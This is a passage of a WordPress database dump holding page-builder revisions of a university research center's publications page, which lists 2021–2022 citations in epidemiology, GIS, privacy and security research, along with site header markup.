Computing.<\\/p><p>Huang, Y., Cai, Z., Pang, J., Xie, Z., &amp; Bourgeois, A. G. (2021, June). Game Theory Based Privacy Protection for Context-Aware Services with Long-Term Time Series Data. In ICC 2021-IEEE International Conference on Communications (pp. 1-6). IEEE.<\\/p><p>Rosen, A., Levin, B., &amp; Bourgeois, A. G. (2021, June). Autonomous Load Balancing in Distributed Hash Tables Using Churn and the Sybil Attack. In 2021 IEEE International Parallel and Distributed Processing Symposium Workshops (IPDPSW) (pp. 631-640). IEEE.<\\/p><p>Tharpe, B., Bourgeois, A. G., &amp; Ashok, A. (2021, June). A do-it-yourself computer vision based robotic ball throw trainer. In Proceedings of the 19th Annual International Conference on Mobile Systems, Applications, and Services (pp. 505-506).<\\/p><p>Huang, Y., Li, W., Wang, J., Cai, Z., &amp; Bourgeois, A. G. (2021). Privacy protection among three antithetic-parties for context-aware services. Journal of Network and Computer Applications, 191, 103115.<\\/p><p>Sidharthan, S., Ashok, A., &amp; Bourgeois, A. (2021, October). Internet service via UAV: user centric comprehensive attack surface analysis. In Proceedings of the 12th ACM Wireless of the Students, by the Students, and for the Students (S3) Workshop (pp. 1-2).<\\/p><p>Younis, A. A., Sunderraman, R., Metzler, M., &amp; Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.<\\/p><p>Ye, H., Yang, X., Takac, M., Sunderraman, R., &amp; Ji, S. (2021). Improving text-to-image synthesis using contrastive learning. arXiv preprint arXiv:2107.02423.<\\/p><p>Abeysinghe, B., Shah, D., Freas, C., Harrison, R., &amp; Sunderraman, R. (2021). POSLAN: Disentangling Chat with Positional and Language encoded Post Embeddings. arXiv preprint arXiv:2107.03529.<\\/p><p>Srimath, S., Ye, Y., Sarker, K., Sunderraman, R., &amp; Ji, S. (2021, October). Human Activity Recognition from RGB Video Streams Using 1D-CNNs. In 2021 IEEE SmartWorld, Ubiquitous Intelligence &amp; Computing, Advanced &amp; Trusted Computing, Scalable Computing &amp; Communications, Internet of People and Smart City Innovation (SmartWorld\\/SCALCOM\\/UIC\\/ATC\\/IOP\\/SCI) (pp. 295-302). IEEE.<\\/p><p>Younis, A. A., Sunderraman, R., Metzler, M., &amp; Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.<\\/p><p>Kleinsasser, M., Tharpe, B., Akula, N., Tirumani, H., Sunderraman, R., &amp; Bourgeois, A. G. (2022, January). Detecting and Predicting Sleep Activity using Biometric Sensor Data. In 2022 14th International Conference on COMmunication Systems &amp; NETworkS (COMSNETS) (pp. 19-24). IEEE.<\\/p>\"}}],\"styleRef\":419,\"type\":\"content\"}],\"id\":\"608-c3\",\"parentId\":\"608-c2\",\"partialId\":608,\"styleRef\":418,\"type\":\"content\"}],\"id\":\"608-c2\",\"parentId\":\"608-c1\",\"partialId\":608,\"styleRef\":417,\"type\":\"content\"}],\"id\":\"608-c1\",\"partialId\":608,\"styleRef\":413,\"type\":\"content\"}','','','inherit','closed','closed','','612-revision-v1','','','2023-09-29 10:23:19','2023-09-29 14:23:19','',612,'https://gsudice.dataconn.net/?p=1433',0,'revision','',0),(1434,1,'2023-09-29 10:23:19','2023-09-29 14:23:19','<div data-colibri-id=\"608-c1\" class=\"style-413 style-local-608-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"608-c2\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-417 style-local-608-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"608-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-418 style-local-608-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-419-outer style-local-608-c4-outer\">\n            <div data-colibri-id=\"608-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-419 style-local-608-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"608-c5\" class=\"h-text h-text-component style-420 style-local-608-c5 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><strong>2022</strong></p>\n                    <p>Atkinson, S. F., Kala, A. K., &amp; Tiwari, C. (2022). Cascading effects of COVID-19 on population mobility and air quality: An exploration including place characteristics using geovisualization. Geospatial Health, 17(s1).</p>\n                    <p>Angelique B.Willis, Mildred Addo, Lauren E.Yoder, Cassandra K. Johnson, Sydney L. Resler, Leticia J. Young, Elizabeth Armstrong-Mensah(2022). Individual and&nbsp;<span>Community Level Factors Related to Sanitation, Water Quality, Treatment and Management in Rural Communities in Accra, Ghana: A Field Study Report.</span></p>\n                    <p>Parcells, R. 2022. Aedes Mosquito Early Warning System: Challenges Integrating Public Health Surveillance Data. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n                    <p>Schuh, E. 2022.&nbsp;Building a resilient energy grid: development of an urban-scale model for energy prediction.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n                    <p>Anand, A. 2022.&nbsp;Aedes Mosquito Early Warning System: Integrating Disparate Environmental Datasets.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n                    <p>Garland, R. 2022.&nbsp;GSU (Georgia State University) Contact Networks and Interventions.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n                    <p>McDaniel, Emma L; Henry Phan; Puneet Singh; Chetan Tiwari; and Armin R Mikler. 2022. Evaluating Potential Exposure Risk to Gastrointestinal Disease-Causing Specimens after Documented Wastewater Spills in Atlanta. Poster presented at:\n                      American Association of Geographers, Annual Meeting 2022.</p>\n                    <p>\n                      <br>\n                    </p>\n                    <p><strong>2021</strong></p>\n                    <p>Northeim, K., Tiwari, C., &amp; Oppong, J. (2021). Surface ozone monitoring and policy: A geospatial decision support tool for suitable location of monitoring stations in urban areas. Environmental Science &amp; Policy, 126, 48-59.</p>\n                    <p>Gwalani, H., Tiwari, C., &amp; Mikler, A. R. (2021). Evaluation of heuristics for the p-median problem: Scale and spatial demand distribution. Computers, Environment and Urban Systems, 88, 101656.</p>\n                    <p>Torres, A. V., Tiwari, C., &amp; Atkinson, S. F. (2021). Progress in ecosystem services research: A guide for scholars and practitioners. Ecosystem Services, 49, 101267.</p>\n                    <p>Northeim, K., Marks, C., &amp; Tiwari, C. (2021). Evaluating spatial patterns of seasonal ozone exposure and incidence of respiratory emergency room visits in Dallas-Fort Worth. PeerJ, 9, e11066.</p>\n                    <p>Haynes, D., &amp; Tiwari, C. (2021). Space-time Classification Index for Assessing COVID-19 Hotspots. medRxiv.</p>\n                    <p>Oppong, J., &amp; Tiwari, C. (2021). GIS and Spatial Representations: Challenges and Missteps. In COVID-19 and Similar Futures (pp. 417-422). Springer, Cham.</p>\n                    <p>O’Neill, M., Poole, M., &amp; Mikler, A. R. (2021). A Synergistic Approach to Data-Driven Response Planning. Disaster medicine and public health preparedness, 15(2), 232-238.</p>\n                    <p>Irany, F. A., Iyer, A., Flores, R. B., &amp; Mikler, A. R. (2021). The Multi-phase spatial meta-heuristic algorithm for public health emergency transportation. arXiv preprint arXiv:2107.04125.</p>\n                    <p>Qian, W., Bhowmick, S., O’Neill, M., Ramisetty-Mikler, S., &amp; Mikler, A. R. (2021). Applying a Probabilistic Infection Model for studying contagion processes in contact networks. Journal of Computational Science, 54, 101419.</p>\n                    <p>Gu, Q., Formby, D., Ji, S., Saltaformaggio, B., Bourgeois, A., &amp; Beyah, R. A. (2021). This Hacker Knows Physics: Device Physics Aware Mimicry Attacks in Cyber-Physical Systems. IEEE Transactions on Dependable and Secure Computing.</p>\n                    <p>Huang, Y., Cai, Z., Pang, J., Xie, Z., &amp; Bourgeois, A. G. (2021, June). Game Theory Based Privacy Protection for Context-Aware Services with Long-Term Time Series Data. In ICC 2021-IEEE International Conference on Communications\n                      (pp. 1-6). IEEE.</p>\n                    <p>Rosen, A., Levin, B., &amp; Bourgeois, A. G. (2021, June). Autonomous Load Balancing in Distributed Hash Tables Using Churn and the Sybil Attack. In 2021 IEEE International Parallel and Distributed Processing Symposium Workshops (IPDPSW)\n                      (pp. 631-640). IEEE.</p>\n                    <p>Tharpe, B., Bourgeois, A. G., &amp; Ashok, A. (2021, June). A do-it-yourself computer vision based robotic ball throw trainer. In Proceedings of the 19th Annual International Conference on Mobile Systems, Applications, and Services\n                      (pp. 505-506).</p>\n                    <p>Huang, Y., Li, W., Wang, J., Cai, Z., &amp; Bourgeois, A. G. (2021). Privacy protection among three antithetic-parties for context-aware services. Journal of Network and Computer Applications, 191, 103115.</p>\n                    <p>Sidharthan, S., Ashok, A., &amp; Bourgeois, A. (2021, October). Internet service via UAV: user centric comprehensive attack surface analysis. In Proceedings of the 12th ACM Wireless of the Students, by the Students, and for the Students\n                      (S3) Workshop (pp. 1-2).</p>\n                    <p>Younis, A. A., Sunderraman, R., Metzler, M., &amp; Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.</p>\n                    <p>Ye, H., Yang, X., Takac, M., Sunderraman, R., &amp; Ji, S. (2021). Improving text-to-image synthesis using contrastive learning. arXiv preprint arXiv:2107.02423.</p>\n                    <p>Abeysinghe, B., Shah, D., Freas, C., Harrison, R., &amp; Sunderraman, R. (2021). POSLAN: Disentangling Chat with Positional and Language encoded Post Embeddings. arXiv preprint arXiv:2107.03529.</p>\n                    <p>Srimath, S., Ye, Y., Sarker, K., Sunderraman, R., &amp; Ji, S. (2021, October). Human Activity Recognition from RGB Video Streams Using 1D-CNNs. In 2021 IEEE SmartWorld, Ubiquitous Intelligence &amp; Computing, Advanced &amp; Trusted\n                      Computing, Scalable Computing &amp; Communications, Internet of People and Smart City Innovation (SmartWorld/SCALCOM/UIC/ATC/IOP/SCI) (pp. 295-302). IEEE.</p>\n                    <p>Younis, A. A., Sunderraman, R., Metzler, M., &amp; Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.</p>\n                    <p>Kleinsasser, M., Tharpe, B., Akula, N., Tirumani, H., Sunderraman, R., &amp; Bourgeois, A. G. (2022, January). Detecting and Predicting Sleep Activity using Biometric Sensor Data. In 2022 14th International Conference on COMmunication\n                      Systems &amp; NETworkS (COMSNETS) (pp. 19-24). IEEE.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Publications','','inherit','closed','closed','','608-revision-v1','','','2023-09-29 10:23:19','2023-09-29 14:23:19','',608,'https://gsudice.dataconn.net/?p=1434',0,'revision','',0),(1435,1,'2023-09-29 10:23:19','2023-09-29 14:23:19','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>&copy; 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics &amp; Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment &amp; Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"id\":\"22-h36\",\"parentId\":\"22-h35\",\"partialId\":22,\"styleRef\":865,\"type\":\"header\",\"props\":{\"text\":\"learn more\",\"link\":{\"value\":\"https:\\/\\/gsudice.dataconn.net\\/?page_id=126\"}}}],\"slot\":null,\"parentId\":\"22-h26\",\"index\":2,\"id\":\"22-h35\",\"partialId\":22,\"styleRef\":864,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h29\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h33\",\"parentId\":\"22-h32\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h34\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h31\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2023-09-29 10:23:19','2023-09-29 14:23:19','',23,'https://gsudice.dataconn.net/?p=1435',0,'revision','',0),(1436,1,'2023-09-29 10:23:19','2023-09-29 14:23:19','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n                <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                    <!---->\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n                <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n                          <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n                                    <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n                                          </a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                         